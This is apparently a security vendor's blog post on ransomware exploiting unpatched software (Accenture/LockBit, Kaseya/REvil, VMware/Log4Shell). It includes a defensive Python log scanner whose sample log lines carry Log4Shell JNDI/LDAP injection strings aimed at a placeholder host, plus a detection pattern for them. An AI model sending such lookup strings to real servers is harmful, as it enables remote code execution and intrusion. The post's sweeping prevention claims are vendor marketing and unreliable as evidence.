Ransomware’s Guilty Pleasure: Unpatched Vulnerabilities

March 24, 2022 | Charles Everette


Cybersecurity pros have had a tough few years with the accelerated onslaught of ransomware attacks. Damages were predicted at more than $6 trillion in 2021 and these attacks show no sign of slowing – in fact, we’re seeing a rise in attacks as they evolve to become more sophisticated and destructive.   

A major trend that has surfaced is a tactical one: we are now seeing cybercriminals actively exploiting vulnerabilities in common software that organizations use every day.  

What are unpatched vulnerabilities? 

Unpatched vulnerabilities are a favored entrance route for bad actors to breach networks. They occur when security teams fail to patch a vulnerability in widely used software and it becomes an attack vector for ransomware. In 2021, there was a reported 29% rise in the exploitation of CVEs associated with ransomware. Ransomware gangs are leveraging zero-day vulnerabilities and taking advantage of older, known vulnerabilities that organizations have been slow to identify and patch. Shockingly, fifty-six percent of vulnerabilities identified prior to 2021 continue to be actively exploited by bad actors.

Security and software vendors are continuously scanning, identifying, and providing critical education and patches around new vulnerabilities – but software is always going to be inherently risky. It is a key reason why known vulnerabilities and unpatched software must be addressed continuously by cybersecurity teams.  

Below are three common vulnerabilities that ransomware groups have leveraged and exploited on a global scale. The case studies detail real-life reports from our customers and our own testing that showcase Deep Instinct’s prowess in preventing these sophisticated and potent zero-day threats – stopping them pre-execution, before they can cause damage. 

Accenture 

Exploit/Ransomware family: LockBit 2.0 
Cost/Ransom Paid: $50M demanded 
Attack Type: Supply Chain and Extortion Ransomware attack 
Date: July, 2021 

Details: Accenture is a global IT firm and one of the world's largest tech consultancies, employing 569,000 employees across 50 countries. The LockBit gang claimed to have stolen over 6 TB of files from the company in July 2021. LockBit heavily relies on mass vulnerability scanning to identify and exploit unpatched flaws or weaknesses.

Accenture reportedly did not pay the ransom and claimed that the affected systems had been recovered from backup. Accenture shared that their restores took 3+ weeks due to investigation and systems cleanup. While the ransom was not paid, the attack cost them in brand reputation and customer trust.  

Takeaway: Deep Instinct would have prevented this ransomware attack from start to finish.   

LockBit 2.0 leverages a malicious component called “StealBit” to facilitate its data exfiltration capabilities. This is not the first time we have seen the adoption of other technologies to increase the effectiveness of the attack vectors and techniques utilized by cyber criminals.

Deep Instinct was able to acquire a sample of LockBit 2.0 (early August version) and test it against our prevention solution. Our threat team and investigators even broke the package down into several fragments, and Deep Instinct prevented every attack vector within the samples. We have also collected several mutated and updated samples since then; Deep Instinct prevented all of these zero-day attacks.

NOTE: One interesting aspect of this attack is the ransomware’s ability to kill any type of monitoring, preventing the collection of baseline data when it is detonated in a secure environment – a feature that is impressive in its sophistication.

Kaseya 

Exploit/Ransomware family: REvil 
Cost/Ransom Paid: $70M demanded 
Attack Type: Double Extortion and Data leak Ransomware attack 
Date: July, 2021 

Details: Kaseya offers an IT management system primarily used by managed service providers (MSPs) and IT teams to provide remote management, automation, and support to their customers. These systems are extremely valuable to IT management companies but can also have a significant negative impact if compromised. By infecting the parent supply chain system – Kaseya in this case – attackers can then gain access to hundreds if not thousands more.

In this highly visible attack – executed during the U.S. 4th of July holiday weekend – multiple MSPs and as many as 1,500 end customers were impacted.

It has been reported by internal whistleblowers that the vulnerability used to launch this attack was initially identified more than five years ago, but not patched. We know that Kaseya was in the process of patching this vulnerability and had already started applying the patches to their cloud infrastructure, which may have prompted the attackers to execute a more rapid attack. It was also shown that legitimate Windows applications were used to assist in sideloading the malicious files. 

Takeaway: Deep Instinct was able to protect over 29,000 systems across 2,000 clients that were otherwise defenseless against this zero-day vulnerability. Under the protection of our platform, zero infections were reported across all clients.

NOTE: A very important distinction here is that the Deep Instinct version (deep learning algorithm) in use by our clients at the time of the Kaseya attack had been created more than eight months prior. It prevented these attacks with NO updates during those eight months, highlighting the power of deep learning to identify and prevent this zero-day attack.

The scripts used to exploit and infiltrate the systems were prevented, the payload packages (if they had been able to be dropped) would have been stopped, and no part of the attack was successful or would have been successful.   

More detailed information from Deep Instinct’s Threat Research team on the ransomware attack on Kaseya VSA can be found in our blog post: Deconstructing the REvil Ransomware Attack on Kaseya VSA.

VMware  

Exploit/Ransomware family: China-based Aquatic Panda/NightSky ransomware 
Cost/Ransom Paid: Part of Log4J (Log4shell) vulnerability 
Attack Type: Double Extortion and Data leak/threat Ransomware attack 
Date: January, 2022 

Details: VMware’s Horizon product was found to have the Log4Shell vulnerability in the Apache Tomcat service embedded within the product. Once a web-facing server with the vulnerability is identified, the attacker uses an LDAP lookup to make the server execute a malicious Java file that injects a web shell into the VMware Blast Secure Gateway service. This gives the threat actors access to the affected network and lets them use the system as a launch point to further infiltrate the target’s infrastructure for nefarious purposes.
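The post describes the exploitation chain from the endpoint-prevention side; on the server side, the lookup string that such a request carries is also visible in the web server’s access log, which is where many teams first confirmed whether an exposed Horizon or Tomcat instance had been probed. The scanner below is an added example written for this article (it is not Deep Instinct’s code and not from the original post): it parses combined-format access-log lines, percent-decodes the request, referer and user-agent fields repeatedly so that double-encoded payloads are normalised, and flags any field containing the JNDI lookup syntax. The log lines, IP addresses and paths are constructed placeholders.

```python
import re
from typing import Dict, List, Optional
from urllib.parse import unquote

# Case-insensitive match for the lookup syntax that Log4Shell attempts embed
# in user-controlled fields such as User-Agent, Referer or query strings.
JNDI_PATTERN = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)

# Combined log format: ip ident user [timestamp] "request" status bytes "referer" "user-agent"
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"'
)

# Constructed sample log (hypothetical hosts and paths, not taken from any incident).
# Lines 1 and 3 carry a lookup string (line 3 percent-encoded in the query); 2 and 4 are benign.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Jan/2022:08:14:02 +0000] "GET /portal/info/jsp/help-portal.jsp HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.9:1389/a}"
198.51.100.4 - - [10/Jan/2022:08:14:05 +0000] "GET /portal/ HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Jan/2022:08:14:09 +0000] "GET /portal/?q=%24%7Bjndi%3Aldap%3A%2F%2F203.0.113.9%2Fx%7D HTTP/1.1" 400 0 "-" "curl/7.79.1"
192.0.2.11 - - [10/Jan/2022:08:15:00 +0000] "POST /portal/login HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""


def fully_decode(value: str, max_rounds: int = 3) -> str:
    """Percent-decode until the value stops changing, so %2524%257B... is seen as ${..."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def scan_line(line: str) -> Optional[Dict]:
    """Return a finding for one access-log line, or None if it parses cleanly and is benign."""
    m = LOG_LINE.match(line)
    if not m:
        return None  # not combined format; a real deployment would count these separately
    for field in ("req", "ref", "ua"):
        decoded = fully_decode(m.group(field))
        hit = JNDI_PATTERN.search(decoded)
        if hit:
            return {
                "ip": m.group("ip"),
                "timestamp": m.group("ts"),
                "status": m.group("status"),
                "field": field,
                "evidence": decoded[hit.start():hit.start() + 40],
            }
    return None


def scan_log(text: str) -> List[Dict]:
    """Scan a whole log body and return findings tagged with their 1-based line number."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        finding = scan_line(line)
        if finding:
            finding["line"] = lineno
            findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"line {f['line']}: {f['ip']} sent a JNDI lookup in {f['field']} "
              f"(HTTP {f['status']}) -> {f['evidence']}")
```

A hit in the log only proves that a lookup string reached the server, not that it was evaluated; the HTTP status and the presence of outbound LDAP connections from the host at that timestamp are what separate a probe from a successful injection, which is why the finding keeps both the status code and the timestamp for correlation.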

While the threat actors originally only targeted VMware’s Horizon product, this vulnerability was later identified to impact 55 of VMware’s products, including vCenter, Carbon Black Cloud Workload and EDR, vRealize, and others. VMware released a patch on February 14, 2022, although it remains to be seen how long this vulnerability will continue to impact organizations that fail to prioritize and patch.

Takeaway: Deep Instinct’s multi-layer protection was able to detect and prevent NightSky ransomware from running. Deep Instinct stops more threats, faster, than any legacy EPP or EDR in the world, including unknown and zero-day threats.    

Take a Prevention-First Approach with Deep Instinct 

Deep Instinct’s Threat Research team has acquired access to all IOCs and suspected ransomware payloads and packages that were detailed in the above ransomware attacks.  

Not only would Deep Instinct have prevented 100% of the attacks if the Deep Instinct Protection Platform had been in use on the endpoints in the victims’ environments, but in >99% of samples tested Deep Instinct would have prevented these attacks even with a version of Deep Instinct’s “D-brain” that was created long before the attacks (3-8 months) and with zero updates since deployment.

To learn more about Deep Instinct’s unique deep learning framework, check out this video.

If you’d like to learn more about our malware, ransomware, and zero-day prevention capabilities – including our industry best $3M no-ransomware guarantee – we’d be delighted to give you a demo.